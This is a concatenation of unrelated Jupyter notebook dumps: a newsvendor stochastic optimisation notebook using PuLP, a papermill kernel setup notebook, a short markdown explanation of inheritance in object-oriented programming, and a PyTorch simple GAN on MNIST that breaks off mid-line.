pd.Series(cluster_proportion_df['cluster_centers'].values, index=cluster_proportion_df['index'].values).to_dict()\n weight = pd.Series(cluster_proportion_df['proportion_labels'].values, index=cluster_proportion_df['index'].values).to_dict()\n scenarios = range(1,len(cluster_proportion_df.cluster_centers.values)+1)\n \n return cluster_proportion_df, demand, weight, scenarios", "_____no_output_____" ], [ "cluster_proportion_df, demand, weight, scenarios = cluster_summ(df=df_train['train_y'])\n\nprint('\\nValues wee need to see : ',demand)\nprint('\\nOccurences of values : ',weight)\nprint('\\nNumber osf scenarios(Values): ',scenarios)", " cluster_centers labels\n0 27.0 0\n1 24.0 1\n2 29.0 2\n3 30.0 3\n4 26.0 4\n train_y labels cluster_centers\n0 27 0 27.0\n1 26 4 26.0\n2 24 1 24.0\n3 31 9 31.0\n4 30 3 30.0\n\nValues wee need to see : {1: 19.0, 2: 20.0, 3: 21.0, 4: 22.0, 5: 23.0, 6: 24.0, 7: 25.0, 8: 26.0, 9: 27.0, 10: 28.0, 11: 29.0, 12: 30.0, 13: 31.0, 14: 32.0, 15: 33.0, 16: 
34.0}\n\nOccurences of values : {1: 0.00125, 2: 0.00625, 3: 0.0125, 4: 0.04, 5: 0.065, 6: 0.09375, 7: 0.1175, 8: 0.17125, 9: 0.13875, 10: 0.1275, 11: 0.09, 12: 0.0825, 13: 0.0325, 14: 0.01, 15: 0.00875, 16: 0.0025}\n\nNumber osf scenarios(Values): range(1, 17)\n" ], [ "cluster_proportion_df.head()", "_____no_output_____" ], [ "cluster_proportion_df", "_____no_output_____" ], [ "19.0/800", "_____no_output_____" ], [ "sum([i[1] for i in weight.items()])", "_____no_output_____" ] ], [ [ "#### b) USING PULP TO SOLVE STOCHASTIC PROGRAMMING", "_____no_output_____" ] ], [ [ "# !pip install pulp pygmo deap", "Requirement already satisfied: pulp in c:\\users\\jkapila\\appdata\\local\\continuum\\anaconda3\\lib\\site-packages (2.1)\nRequirement already satisfied: pygmo in c:\\users\\jkapila\\appdata\\local\\continuum\\anaconda3\\lib\\site-packages (2.13.0)\nRequirement already satisfied: deap in c:\\users\\jkapila\\appdata\\local\\continuum\\anaconda3\\lib\\site-packages (1.3.1)\nRequirement already satisfied: pyparsing>=2.0.1 in c:\\users\\jkapila\\appdata\\local\\continuum\\anaconda3\\lib\\site-packages (from pulp) (2.4.0)\nRequirement already satisfied: numpy in c:\\users\\jkapila\\appdata\\local\\continuum\\anaconda3\\lib\\site-packages (from pygmo) (1.16.4)\nRequirement already satisfied: cloudpickle in c:\\users\\jkapila\\appdata\\local\\continuum\\anaconda3\\lib\\site-packages (from pygmo) (1.2.1)\n" ], [ "from pulp import *\n\nN = 100 # maximum item to purchase\ncost_price = 20 # amount paid to the supplier\nsell_price = 21 # amount paid by the customer\nwaste_price = 0 # amount paid if we sell the remaining goods (ie. 
when we have more stock as prediction > demand)", "_____no_output_____" ], [ "##########################################\n# DEFINE VARIABLES\n##########################################\n\n# Defining our problem statement \nM = LpProblem(\"Newsvendor1\", LpMaximize)\n\n# Defining the variable which needs to be optimized\nx = LpVariable('x', lowBound=0)\n\n# Defining the scenarios / value demamds / clusterd y values\nz = LpVariable.dicts('z', scenarios, 0)\n\nprint('Problem Statement: ',M)\nprint('X variable: ',x)\nprint('Z variable: ',z)\n\n##########################################\n# DEFINE MODELS: CONSTRAINTS\n##########################################\n\nfor i in scenarios:\n print(demand[i])\n print(weight[i])\n M += x <= N # the maximum value our independent varaible can have for a scenario\n M += z[i] <= x # telling the scenario cannot have more casses than its occurence\n M += z[i] <= demand[i] # defining the upper limit of values a scenario can attain\n\nprint('Problem Statement with constraints: ', M)\nprint('X variable: ', x)\nprint('Z variable: ', z)\n \n##########################################\n# DEFINE MODELS: OBJECTIVE\n##########################################\n\nM += sum(weight[i] * (sell_price * z[i] + waste_price * (x - z[i])) for i in scenarios) - (cost_price * x) \n\nprint('Problem Statement with constraints and solution points: ',M)\nM.solve()\n", "Problem Statement: Newsvendor1:\nMAXIMIZE\nNone\nVARIABLES\n\nX variable: x\nZ variable: {1: z_1, 2: z_2, 3: z_3, 4: z_4, 5: z_5, 6: z_6, 7: z_7, 8: z_8, 9: z_9, 10: z_10, 11: z_11, 12: z_12, 13: z_13, 14: z_14, 15: z_15, 16: z_16}\n19.0\n0.00125\n20.0\n0.00625\n21.0\n0.0125\n22.0\n0.04\n23.0\n0.065\n24.0\n0.09375\n25.0\n0.1175\n26.0\n0.17125\n27.0\n0.13875\n28.0\n0.1275\n29.0\n0.09\n30.0\n0.0825\n31.0\n0.0325\n32.0\n0.01\n33.0\n0.00875\n34.0\n0.0025\nProblem Statement with constraints: Newsvendor1:\nMAXIMIZE\nNone\nSUBJECT TO\n_C1: x <= 100\n\n_C2: - x + z_1 <= 0\n\n_C3: z_1 <= 19\n\n_C4: x <= 
100\n\n_C5: - x + z_2 <= 0\n\n_C6: z_2 <= 20\n\n_C7: x <= 100\n\n_C8: - x + z_3 <= 0\n\n_C9: z_3 <= 21\n\n_C10: x <= 100\n\n_C11: - x + z_4 <= 0\n\n_C12: z_4 <= 22\n\n_C13: x <= 100\n\n_C14: - x + z_5 <= 0\n\n_C15: z_5 <= 23\n\n_C16: x <= 100\n\n_C17: - x + z_6 <= 0\n\n_C18: z_6 <= 24\n\n_C19: x <= 100\n\n_C20: - x + z_7 <= 0\n\n_C21: z_7 <= 25\n\n_C22: x <= 100\n\n_C23: - x + z_8 <= 0\n\n_C24: z_8 <= 26\n\n_C25: x <= 100\n\n_C26: - x + z_9 <= 0\n\n_C27: z_9 <= 27\n\n_C28: x <= 100\n\n_C29: - x + z_10 <= 0\n\n_C30: z_10 <= 28\n\n_C31: x <= 100\n\n_C32: - x + z_11 <= 0\n\n_C33: z_11 <= 29\n\n_C34: x <= 100\n\n_C35: - x + z_12 <= 0\n\n_C36: z_12 <= 30\n\n_C37: x <= 100\n\n_C38: - x + z_13 <= 0\n\n_C39: z_13 <= 31\n\n_C40: x <= 100\n\n_C41: - x + z_14 <= 0\n\n_C42: z_14 <= 32\n\n_C43: x <= 100\n\n_C44: - x + z_15 <= 0\n\n_C45: z_15 <= 33\n\n_C46: x <= 100\n\n_C47: - x + z_16 <= 0\n\n_C48: z_16 <= 34\n\nVARIABLES\nx Continuous\nz_1 Continuous\nz_10 Continuous\nz_11 Continuous\nz_12 Continuous\nz_13 Continuous\nz_14 Continuous\nz_15 Continuous\nz_16 Continuous\nz_2 Continuous\nz_3 Continuous\nz_4 Continuous\nz_5 Continuous\nz_6 Continuous\nz_7 Continuous\nz_8 Continuous\nz_9 Continuous\n\nX variable: x\nZ variable: {1: z_1, 2: z_2, 3: z_3, 4: z_4, 5: z_5, 6: z_6, 7: z_7, 8: z_8, 9: z_9, 10: z_10, 11: z_11, 12: z_12, 13: z_13, 14: z_14, 15: z_15, 16: z_16}\nProblem Statement with constraints and solution points: Newsvendor1:\nMAXIMIZE\n-20*x + 0.02625*z_1 + 2.6775*z_10 + 1.89*z_11 + 1.7325000000000002*z_12 + 0.6825*z_13 + 0.21*z_14 + 0.18375000000000002*z_15 + 0.0525*z_16 + 0.13125*z_2 + 0.2625*z_3 + 0.84*z_4 + 1.365*z_5 + 1.96875*z_6 + 2.4675*z_7 + 3.5962500000000004*z_8 + 2.9137500000000003*z_9 + 0.0\nSUBJECT TO\n_C1: x <= 100\n\n_C2: - x + z_1 <= 0\n\n_C3: z_1 <= 19\n\n_C4: x <= 100\n\n_C5: - x + z_2 <= 0\n\n_C6: z_2 <= 20\n\n_C7: x <= 100\n\n_C8: - x + z_3 <= 0\n\n_C9: z_3 <= 21\n\n_C10: x <= 100\n\n_C11: - x + z_4 <= 0\n\n_C12: z_4 <= 22\n\n_C13: x <= 100\n\n_C14: - 
x + z_5 <= 0\n\n_C15: z_5 <= 23\n\n_C16: x <= 100\n\n_C17: - x + z_6 <= 0\n\n_C18: z_6 <= 24\n\n_C19: x <= 100\n\n_C20: - x + z_7 <= 0\n\n_C21: z_7 <= 25\n\n_C22: x <= 100\n\n_C23: - x + z_8 <= 0\n\n_C24: z_8 <= 26\n\n_C25: x <= 100\n\n_C26: - x + z_9 <= 0\n\n_C27: z_9 <= 27\n\n_C28: x <= 100\n\n_C29: - x + z_10 <= 0\n\n_C30: z_10 <= 28\n\n_C31: x <= 100\n\n_C32: - x + z_11 <= 0\n\n_C33: z_11 <= 29\n\n_C34: x <= 100\n\n_C35: - x + z_12 <= 0\n\n_C36: z_12 <= 30\n\n_C37: x <= 100\n\n_C38: - x + z_13 <= 0\n\n_C39: z_13 <= 31\n\n_C40: x <= 100\n\n_C41: - x + z_14 <= 0\n\n_C42: z_14 <= 32\n\n_C43: x <= 100\n\n_C44: - x + z_15 <= 0\n\n_C45: z_15 <= 33\n\n_C46: x <= 100\n\n_C47: - x + z_16 <= 0\n\n_C48: z_16 <= 34\n\nVARIABLES\nx Continuous\nz_1 Continuous\nz_10 Continuous\nz_11 Continuous\nz_12 Continuous\nz_13 Continuous\nz_14 Continuous\nz_15 Continuous\nz_16 Continuous\nz_2 Continuous\nz_3 Continuous\nz_4 Continuous\nz_5 Continuous\nz_6 Continuous\nz_7 Continuous\nz_8 Continuous\nz_9 Continuous\n\n" ], [ "##########################################\n# PRINT RESULTS\n##########################################\n\nprint(\"Status = %s\" % LpStatus[M.status])\n\nprint(\"%s = %f\" % (x.name, x.varValue))\nfor i in scenarios:\n print(\"%s = %f\" % (z[i].name, z[i].varValue))\nprint(\"Objective = %f\" % (M.objective.value()))", "Status = Optimal\nx = 22.000000\nz_1 = 19.000000\nz_2 = 20.000000\nz_3 = 21.000000\nz_4 = 22.000000\nz_5 = 22.000000\nz_6 = 22.000000\nz_7 = 22.000000\nz_8 = 22.000000\nz_9 = 22.000000\nz_10 = 22.000000\nz_11 = 22.000000\nz_12 = 22.000000\nz_13 = 22.000000\nz_14 = 22.000000\nz_15 = 22.000000\nz_16 = 22.000000\nObjective = 21.396250\n" ] ], [ [ "#### c) CHECK AS TABLE (MANUAL CALCULATION): TO SEE CLEARLY WHAT HAPPENS", "_____no_output_____" ] ], [ [ "def result_summ(cluster_proportion_df, demand, weight, sell_price, cost_price, waste_price):\n '''Summarize result by comparing possible scenario (example_df) with its possible execution (purchase_df).\n We 
want to look how much profit we can get given a pair of scenario and its execution, \n weighted with the probability of each scenario to happen.\n Input:\n cluster_proportion_df = dataframe containing complete information about probability for each scenario\n demand = possible scenario to happen\n weight = probability of the possible scenario to happen\n cost_price = amount paid to the supplier\n sell_price = amount paid by the customer\n waste_price = amount paid if we sell the remaining goods\n\n Output:\n example_df = dataframe after cross join between possible scenario and possible execution\n example_df_summ = summary of example_df to obtain total expected profit per possible execution\n '''\n \n # get the basic df: purchase_df for the demand and example_df for the possible scenario execution\n purchase_df = pd.DataFrame({'key': 0, 'item_to_purchase': demand})\n example_df = pd.DataFrame({'key': 0, 'item_to_sell': cluster_proportion_df['cluster_centers'], \n 'probability': cluster_proportion_df['proportion_labels']})\n example_df = example_df.merge(purchase_df, on='key', how='outer')\n example_df = example_df.drop('key', axis=1).sort_values(['item_to_purchase', 'item_to_sell'])\n \n example_df['total_revenue'] = example_df[['item_to_sell', 'item_to_purchase']].min(axis=1) * sell_price\n example_df['total_cost'] = example_df['item_to_purchase'] * cost_price\n example_df['total_profit'] = (example_df['total_revenue'] - example_df['total_cost'])\n \n example_df['total_weighted_profit'] = example_df['probability'] * example_df['total_profit']\n example_df['total_cumsum_profit'] = example_df.groupby('item_to_purchase')['total_weighted_profit'].cumsum()\n\n example_df_summ = example_df.groupby('item_to_purchase', as_index=False)['total_weighted_profit'].sum()\n \n return example_df, example_df_summ", "_____no_output_____" ], [ "example_df, example_df_summ = result_summ(cluster_proportion_df=cluster_proportion_df, demand=demand, weight=weight, \n 
sell_price=sell_price, cost_price=cost_price, waste_price=waste_price)\nexample_df", "_____no_output_____" ] ], [ [ "#### d) VISUAL CHECK", "_____no_output_____" ] ], [ [ "# limit the table, we don't want to be overwhelmed\ntemp = example_df[(example_df['item_to_purchase'] >= 20) & (example_df['item_to_purchase'] <= 25)]\ntemp.loc[:,'item_to_purchase'] = temp['item_to_purchase'].astype('str')", "C:\\Users\\jkapila\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\indexing.py:494: SettingWithCopyWarning: \nA value is trying to be set on a copy of a slice from a DataFrame.\nTry using .loc[row_indexer,col_indexer] = value instead\n\nSee the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy\n self.obj[item] = s\n" ], [ "# check the weighted profit per possible scenario: \n# we can see how higher execution causes greater loss during weak demand and hence,\n# higher execution number has difficulty in bouncing the profit up \n\nfig, ax = plt.subplots()\n\nfor i in temp['item_to_purchase'].unique():\n temp[temp['item_to_purchase'] == i].plot.line(x='item_to_purchase', y='total_weighted_profit', ax=ax, label=str(i))\nplt.xticks(range(0,np.unique(temp['item_to_sell']).shape[0]),np.unique(temp['item_to_sell']),rotation=45)\nplt.show()", "_____no_output_____" ], [ "# check the total expected profit, which comes from all possible profit \n# and weighted by the probability of the scenario to happen\nplt.figure()\nsns.scatterplot(x='item_to_purchase', y='total_weighted_profit', data=example_df_summ)\nplt.show()", "_____no_output_____" ] ], [ [ "### 5) PREDICTION + STOCHASTIC PROGRAMMING\n#### a) BOOTSTRAPPING", "_____no_output_____" ] ], [ [ "size_bstrap = 50\niter = 100\nidx_check = 172\ntest_y_bstrap = []\ncoef_bstrap = []\nintercept_bstrap = []\n\nfor i in range(iter):\n \n # sampling with replacement\n idx = np.random.choice(np.arange(0,train_x.shape[0]), size_bstrap, 
replace=True)\n train_x_temp = train_x[idx]\n train_y_temp = train_y[idx]\n \n # do linear regression\n lr_bstrap = LinearRegression()\n lr_bstrap.fit(train_x_temp, train_y_temp)\n \n # get coefficient and intercept\n coef_bstrap.append(lr_bstrap.coef_)\n intercept_bstrap.append(lr_bstrap.intercept_)\n \n # get result, only for intended index idx_check\n # test_y_bstrap.append((lr_bstrap.predict(test_x)[idx_check][0]).astype(int))\n result_temp = np.rint(lr_bstrap.intercept_ + lr_bstrap.coef_ * test_x[idx_check])[0,0]\n test_y_bstrap.append(result_temp)\n ", "_____no_output_____" ], [ "result_bstrap = pd.DataFrame({'test_y_bstrap': test_y_bstrap})\nresult_bstrap['test_x_bstrap'] = test_x[idx_check][0]\nresult_bstrap", "_____no_output_____" ], [ "result_bstrap_summ = result_bstrap.groupby('test_y_bstrap').count().reset_index(drop=False)\nresult_bstrap_summ", "_____no_output_____" ] ], [ [ "#### b) DISCRETIZING DEMAND", "_____no_output_____" ] ], [ [ "cluster_proportion_df_bstrap, demand_bstrap, weight_bstrap, scenarios_bstrap = cluster_summ(df=result_bstrap['test_y_bstrap'])\n\nprint(demand_bstrap)\nprint(weight_bstrap)\nprint(scenarios_bstrap)", "{1: 26.0}\n{1: 1.0}\nrange(1, 2)\n" ] ], [ [ "#### c) USING PULP TO SOLVE STOCHASTIC PROGRAMMING", "_____no_output_____" ] ], [ [ "##########################################\n# DEFINE VARIABLES\n##########################################\n\nM_bstrap = LpProblem(\"Newsvendor2\", LpMaximize)\n\nx_bstrap = LpVariable('x_bstrap', lowBound=0)\nz_bstrap = LpVariable.dicts('z_bstrap', scenarios_bstrap, 0)\n\n\n##########################################\n# DEFINE MODELS: CONSTRAINTS\n##########################################\n\nfor i in scenarios_bstrap:\n print(demand_bstrap[i])\n print(weight_bstrap[i])\n M_bstrap += x_bstrap <= N\n M_bstrap += z_bstrap[i] <= x_bstrap\n M_bstrap += z_bstrap[i] <= demand_bstrap[i]\n\n \n##########################################\n# DEFINE MODELS: 
OBJECTIVE\n##########################################\n\nM_bstrap += sum(weight_bstrap[i] * (sell_price * z_bstrap[i] + waste_price * (x_bstrap - z_bstrap[i])) for i in scenarios_bstrap) - (cost_price * x_bstrap) \nM_bstrap.solve()\n\n\n##########################################\n# PRINT RESULTS\n##########################################\n\nprint(\"Status = %s\" % LpStatus[M_bstrap.status])\n\nprint(\"%s = %f\" % (x_bstrap.name, x_bstrap.varValue))\nfor i in scenarios_bstrap:\n print(\"%s = %f\" % (z_bstrap[i].name, z_bstrap[i].varValue))\nprint(\"Objective = %f\" % (M_bstrap.objective.value()))\n\n", "33.0\n0.13\n34.0\n0.87\nStatus = Optimal\nx_bstrap = 33.000000\nz_bstrap_1 = 33.000000\nz_bstrap_2 = 33.000000\nObjective = 33.000000\n" ] ], [ [ "#### d) CHECK AS TABLE (MANUAL CALCULATION): TO SEE CLEARLY WHAT HAPPENS", "_____no_output_____" ] ], [ [ "example_df_bstrap, example_df_summ_bstrap = result_summ(cluster_proportion_df=cluster_proportion_df_bstrap, \n demand=demand_bstrap, weight=weight_bstrap, \n sell_price=sell_price, cost_price=cost_price, \n waste_price=waste_price)\nexample_df_bstrap.head(n=5)", "_____no_output_____" ], [ "# optimal decision will only change if we increase sales_price (eg. 
sales_price = 23)\nexample_df_bstrap, example_df_summ_bstrap = result_summ(cluster_proportion_df=cluster_proportion_df_bstrap, \n demand=demand_bstrap, weight=weight_bstrap, \n sell_price=23, cost_price=cost_price, \n waste_price=waste_price)\nexample_df_bstrap.head(n=5)", "_____no_output_____" ] ], [ [ "#### d) VISUAL CHECK", "_____no_output_____" ] ], [ [ "example_df_bstrap.loc[:,'item_to_purchase'] = example_df_bstrap['item_to_purchase'].astype('str')", "_____no_output_____" ], [ "# check the weighted profit per possible scenario: \n# we can see how higher execution causes greater loss during weak demand and hence,\n# higher execution number has difficulty in bouncing the profit up \n\nfig, ax = plt.subplots()\n\nfor i in example_df_bstrap['item_to_purchase'].unique():\n example_df_bstrap[example_df_bstrap['item_to_purchase'] == i].plot.line(x='item_to_purchase', y='total_weighted_profit', ax=ax, label=str(i))\nplt.xticks(range(0,np.unique(example_df_bstrap['item_to_sell']).shape[0]),np.unique(example_df_bstrap['item_to_sell']),rotation=45)\nplt.show()", "_____no_output_____" ], [ "# check the total expected profit, which comes from all possible profit \n# and weighted by the probability of the scenario to happen\nplt.figure()\nsns.scatterplot(x='item_to_purchase', y='total_weighted_profit', data=example_df_summ_bstrap)\nplt.show()", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ] ]
e7308907a894c0c731ed1f89768355fac0b5fd3f
4,735
ipynb
Jupyter Notebook
Prepare_papermill_schulung3.ipynb
geomar-od-lagrange/papermill-demo
12a410bd84e4eb3e0379fa6a9b4a20f0105aa2a3
[ "MIT" ]
null
null
null
Prepare_papermill_schulung3.ipynb
geomar-od-lagrange/papermill-demo
12a410bd84e4eb3e0379fa6a9b4a20f0105aa2a3
[ "MIT" ]
2
2021-02-09T09:57:07.000Z
2021-02-10T16:58:41.000Z
Prepare_papermill_schulung3.ipynb
geomar-od-lagrange/papermill-demo
12a410bd84e4eb3e0379fa6a9b4a20f0105aa2a3
[ "MIT" ]
null
null
null
39.789916
158
0.594298
[ [ [ "# Prepare papermill for schulung3.geomar.de\n\n1. Make sure you have activated the correct kernel\n2. Install kernel manually", "_____no_output_____" ] ], [ [ "!python -m ipykernel install --user --name py3_lagrange_v2.2.2", "Installed kernelspec py3_lagrange_v2.2.2 in /home/jupyter-wrath/.local/share/jupyter/kernels/py3_lagrange_v2.2.2\n" ], [ "!jupyter kernelspec list", "[ListKernelSpecs] WARNING | Config option `kernel_spec_manager_class` not recognized by `ListKernelSpecs`.\nAvailable kernels:\n conda-env-monitoring-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-env-monitoring-py\n conda-env-py3_euler-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-env-py3_euler-py\n conda-env-py3_euler_brokenline-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-env-py3_euler_brokenline-py\n conda-env-py3_euler_brokenline_2020.08.20.1-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-env-py3_euler_brokenline_2020.08.20.1-py\n conda-env-py3_euler_intake-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-env-py3_euler_intake-py\n conda-env-py3_euler_xoak-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-env-py3_euler_xoak-py\n conda-env-py3_lagrange-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-env-py3_lagrange-py\n conda-env-py3_lagrange_dev-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-env-py3_lagrange_dev-py\n conda-env-py3_lagrange_parcels-dev-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-env-py3_lagrange_parcels-dev-py\n conda-env-py3_lagrange_parcels-v2.2.0-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-env-py3_lagrange_parcels-v2.2.0-py\n conda-env-py3_lagrange_v2.0.0-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-env-py3_lagrange_v2.0.0-py\n conda-env-py3_lagrange_v2.2.2-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-env-py3_lagrange_v2.2.2-py\n conda-env-py3_xoak-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-env-py3_xoak-py\n 
conda-root-py /home/jupyter-wrath/.local/share/jupyter/kernels/conda-root-py\n py3_lagrange_v2.2.2 /home/jupyter-wrath/.local/share/jupyter/kernels/py3_lagrange_v2.2.2\n python3 /opt/tljh/user/envs/py3_lagrange_v2.2.2/share/jupyter/kernels/python3\n" ] ], [ [ "## Run papermill on schulung3.geomar.de", "_____no_output_____" ] ], [ [ "!papermill original_notebooks/01_papermill_demo.ipynb evaluated_notebooks/01_papermill_demo.ipynb -k py3_lagrange_v2.2.2", "Input Notebook: original_notebooks/01_papermill_demo.ipynb\nOutput Notebook: evaluated_notebooks/01_papermill_demo.ipynb\nExecuting: 0%| | 0/6 [00:00<?, ?cell/s]Executing notebook with kernel: py3_lagrange_v2.2.2\nExecuting: 100%|████████████████████████████████| 6/6 [00:02<00:00, 2.71cell/s]\n" ] ] ]
[ "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ] ]
e730961b9e6ab816f8061928929fce5429660f01
2,247
ipynb
Jupyter Notebook
object-oriented-programming/inheritance.ipynb
RatanShreshtha/Crash-Course-Computer-Science
c03054c89d0853051f9bacf08529d0579e885995
[ "MIT" ]
1
2020-09-08T12:50:37.000Z
2020-09-08T12:50:37.000Z
object-oriented-programming/inheritance.ipynb
RatanShreshtha/crash-course
c03054c89d0853051f9bacf08529d0579e885995
[ "MIT" ]
null
null
null
object-oriented-programming/inheritance.ipynb
RatanShreshtha/crash-course
c03054c89d0853051f9bacf08529d0579e885995
[ "MIT" ]
null
null
null
47.808511
606
0.70316
[ [ [ "# Inheritance\n\nObjects are often very similar. They share common logic. But they’re not entirely the same. Ugh… So how do we reuse the common logic and extract the unique logic into a separate class? One way to achieve this is inheritance. Inheritance allows classes to inherit features of other classes. Put another way, parent classes extend attributes and behaviors to child classes. Inheritance supports reusability – if basic attributes and behaviors are defined in a parent class, child classes can be created extending the functionality of the parent class, and adding additional attributes and behaviors.\n\nLet’s say that teachers and students are a special type of person that have subjects to tech and learn and few more information and behaviours. We can create child classes `Teacher` and `Student` from the parent class `Person`, and then add behaviors. The benefits of inheritance are programs can create a generic parent class, and then create more specific child classes as needed. This simplifies overall programming, because instead of recreating the structure of the `Person` class multiple times, **child classes can extend the functionality of a parent class**.\n\n<!-- ![Inheritance](./images/inheritance.png) -->\n\n## Benefits of inheritance:\n\n- Code reuse: create generic classes, and then create more specific classes as needed which inherit from generic classes\n- Code organisation: inheritance makes you think about structures of your in term of generic to specific objects", "_____no_output_____" ] ] ]
[ "markdown" ]
[ [ "markdown" ] ]
e7309d948db205106750d47a59375f93fe090079
272,632
ipynb
Jupyter Notebook
SimpleGAN.ipynb
Pi-Akash/Pytorch-Learnings
e1737747638af1482bca58fbb14335df6422f138
[ "MIT" ]
null
null
null
SimpleGAN.ipynb
Pi-Akash/Pytorch-Learnings
e1737747638af1482bca58fbb14335df6422f138
[ "MIT" ]
null
null
null
SimpleGAN.ipynb
Pi-Akash/Pytorch-Learnings
e1737747638af1482bca58fbb14335df6422f138
[ "MIT" ]
null
null
null
622.447489
120,012
0.947651
[ [ [ "# A few resources which has helped me understand the topic better:\n# - https://www.youtube.com/watch?v=ZIvhuC0srXs\n# - https://jonathan-hui.medium.com/gan-whats-generative-adversarial-networks-and-its-application-f39ed278ef09\n# - https://www.youtube.com/watch?v=OljTVUVzPpM&list=PLhhyoLH6IjfwIp8bZnzX8QR30TRcHO8Va&index=2", "_____no_output_____" ], [ "# importing libraries\nimport torch\nimport torch.optim as optim\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nfrom torch.utils.data import DataLoader\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom torch.utils.tensorboard import SummaryWriter\nfrom datetime import datetime", "_____no_output_____" ], [ "# path where my resources are in local\npath = \"D:/Datasets/GANS\"\nos.chdir(path)", "_____no_output_____" ], [ "# you can play around with this to add more complex transformations.\n# the dataset is very small so I have added a few transformation to increase the count.\n# the transformations are pretty self explanatory\n# if you are going to use an external dataset, then feel free to uncomment the below transformations\ntransform = transforms.Compose([\n #transforms.Resize(28),\n #transforms.Grayscale(1),\n transforms.ToTensor(),\n #transforms.RandomHorizontalFlip(p=0.5),\n #transforms.RandomVerticalFlip(p=0.5)\n])", "_____no_output_____" ], [ "# hyperparameters\ndevice = \"cpu\" # i dont have a gpu.\nlr = 3e-4 \nnotebook = False", "_____no_output_____" ], [ "# you can find the dataset i have used in the below link:\n# https://www.kaggle.com/cactus3/basicshapes\n\n# uncomment the below line if you are using a dataset from local, and provide necessary folder location.\n# dataset = datasets.ImageFolder(\"Shapes/training_set\", transform = transform)\nbatch_size = 32\ndataset = datasets.MNIST(root=\"SimpleGansMNIST/\", transform = transform, download = True)\nloader = 
torch.utils.data.DataLoader(dataset, batch_size = batch_size, shuffle = True)", "_____no_output_____" ], [ "# lets see if our data is properly loaded\ndef plot_images(images):\n imgs = torchvision.utils.make_grid(images)\n npimgs = imgs.numpy()\n plt.figure(figsize = (8, 8))\n plt.imshow(np.transpose(npimgs, (1,2,0)), cmap = 'gray')\n plt.xticks([])\n plt.yticks([])\n plt.show()", "_____no_output_____" ], [ "examples_data, examples_labels = next(iter(loader))\nprint(examples_data.shape, examples_labels.shape)\n\nif notebook == True:\n plot_images(examples_data)", "torch.Size([32, 1, 28, 28]) torch.Size([32])\n" ], [ "# Z_dim is the input vector of 100 dim to the generator\n# Z_dim vector will be sampled from gaussian dstribution with 0 mean and 1 std\nZ_dim = 100\n\n# H_dim is the no of hidden nodes in the hidden layer\nH_dim = 256\n\n# X_dim is the flattened input vector to the neural network\nX_dim = examples_data.view(examples_data.shape[0], -1).shape[-1]\n\nprint(Z_dim, H_dim, X_dim)", "100 256 784\n" ], [ "# Generator Model\n# 1 hidden layer sequential model\nclass Generator(nn.Module):\n def __init__(self, generator_input_dim, output_image_dim):\n super(Generator, self).__init__()\n self.model = nn.Sequential(\n nn.Linear(generator_input_dim, H_dim),\n nn.LeakyReLU(0.1),\n nn.Linear(H_dim, output_image_dim),\n nn.Sigmoid(),\n )\n \n def forward(self, x):\n return self.model(x)", "_____no_output_____" ], [ "# No error, the implementation for generator looks good\nG = Generator(Z_dim, X_dim)", "_____no_output_____" ], [ "# Discriminator model\n# 1 hidden layer sequential model\nclass Discriminator(nn.Module):\n def __init__(self, input_image_dim):\n super(Discriminator, self).__init__()\n self.model = nn.Sequential(\n nn.Linear(input_image_dim, H_dim),\n nn.LeakyReLU(0.1),\n nn.Linear(H_dim, 1),\n nn.Sigmoid()\n )\n \n def forward(self, x):\n return self.model(x)", "_____no_output_____" ], [ "# No error, the implementation for discriminator looks good\nD = 
Discriminator(X_dim)", "_____no_output_____" ], [ "G_opt = optim.Adam(G.parameters(), lr = lr)\nD_opt = optim.Adam(D.parameters(), lr = lr)\n\n# summary writers\nwriter_fake = SummaryWriter(\"TensorboardFiles/simpleGans/runs/fake\")\nwriter_real = SummaryWriter(\"TensorboardFiles/simpleGans/runs/real\")\nsteps = 0 # global steps", "_____no_output_____" ], [ "# training loop\nn_epochs = 2\nstart = datetime.now()\nfor epoch in range(n_epochs):\n # setting initial loss values before every epoch\n G_loss_run = 0.0\n D_loss_run = 0.0\n \n for batch_idx, data in enumerate(loader):\n Real, _ = data\n batch_size = Real.shape[0]\n # reshaping the data into (batch_size, 784) matrix\n Real = Real.view(Real.shape[0], -1).to(device)\n \n # In discriminator we are trying to train it to better differentiate between real and false images\n # forward propagation for discriminator\n # true labels to match with real images during loss calculation\n one_labels = torch.ones(batch_size, 1)\n # false labels to match with fake images during loss calculation\n zero_labels = torch.zeros(batch_size, 1)\n \n # generating noise, which is input for generator\n noise = torch.randn(batch_size, Z_dim).to(device)\n \n # discriminator returns a value in between 0 and 1,\n # the returned value is compared against the true/false labels\n Disc_real = 